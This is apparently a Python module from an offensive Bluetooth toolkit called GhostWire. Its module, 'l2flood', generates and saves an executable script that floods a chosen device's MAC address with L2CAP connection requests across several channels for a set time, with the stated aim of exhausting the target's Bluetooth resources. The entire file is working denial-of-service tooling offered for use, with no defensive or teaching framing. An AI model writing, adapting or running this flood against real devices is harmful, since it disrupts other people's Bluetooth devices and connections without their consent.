"""
GhostWire Bluetooth Module — L2CAP Flood DoS
Floods target with L2CAP connection requests to exhaust resources.
"""

import subprocess
import time
import os
from ghostwire.core.base import BaseModule, Meta


class Module(BaseModule):
    class Meta(Meta):
        name = "l2flood"
        description = "L2CAP flood DoS — exhaust target BT resources"
        category = "bt"
        requirements = []
        options = {
            "target": {"description": "Target BT MAC address", "required": True},
            "duration": {"description": "Flood duration in seconds", "default": 30},
            "hci": {"description": "HCI device", "required": False},
        }

    def info(self):
        return f"L2CAP flood -> {self.get_option('target')} for {self.get_option('duration', 30)}s"

    def run(self, **kwargs):
        target = self.get_option("target") or kwargs.get("target")
        duration = int(self.get_option("duration", 30))
        hci = self.get_option("hci") or self.ctx.config.get("bt_iface") or "hci0"

        if not target:
            self.logger.error("No target MAC specified")
            return

        self.logger.info(f"L2CAP Flood DoS against {target} ({duration}s)")

        # Generate and run flood script
        from pathlib import Path
        out_dir = Path(self.ctx.config.get("output_dir"))
        out_dir.mkdir(parents=True, exist_ok=True)
        script_path = out_dir / f"l2flood_{target.replace(':', '')}.py"

        script_content = f'''#!/usr/bin/env python3
"""L2CAP Flood DoS — Generated by GhostWire"""
import bluetooth
import os
import time
import sys
import signal

TARGET = "{target}"
DURATION = {duration}
running = True

def handler(sig, frame):
    global running
    running = False

signal.signal(signal.SIGINT, handler)

def flood():
    print(f"[*] L2CAP Flood -> {{TARGET}} ({{DURATION}}s)")
    count = 0
    start = time.time()

    while running and (time.time() - start) < DURATION:
        try:
            sock = bluetooth.BluetoothSocket(bluetooth.L2CAP)
            sock.settimeout(2)
            for psm in [0x0001, 0x0003, 0x0006, 0x000f, 0x001f]:
                try:
                    sock.connect((TARGET, psm))
                    count += 1
                    if count % 20 == 0:
                        print(f"[+] {{count}} connections ({{time.time()-start:.1f}}s)")
                    sock.close()
                except:
                    pass
        except:
            pass

    elapsed = time.time() - start
    print(f"\\n[*] Done: {{count}} connections in {{elapsed:.1f}}s ({{count/max(elapsed,0.1):.1f}}/s)")

if __name__ == "__main__":
    if os.geteuid() != 0:
        print("[-] Run as root"); sys.exit(1)
    flood()
'''
        script_path.write_text(script_content)
        script_path.chmod(0o755)
        self.logger.success(f"Flood script: {str(script_path)}")
        self.logger.info("Run with: sudo python3 " + str(script_path))

        self.session.add_result({
            "module": "bt/l2flood",
            "target": target,
            "duration": duration,
            "script": str(script_path),
            "status": "script_generated",
        })
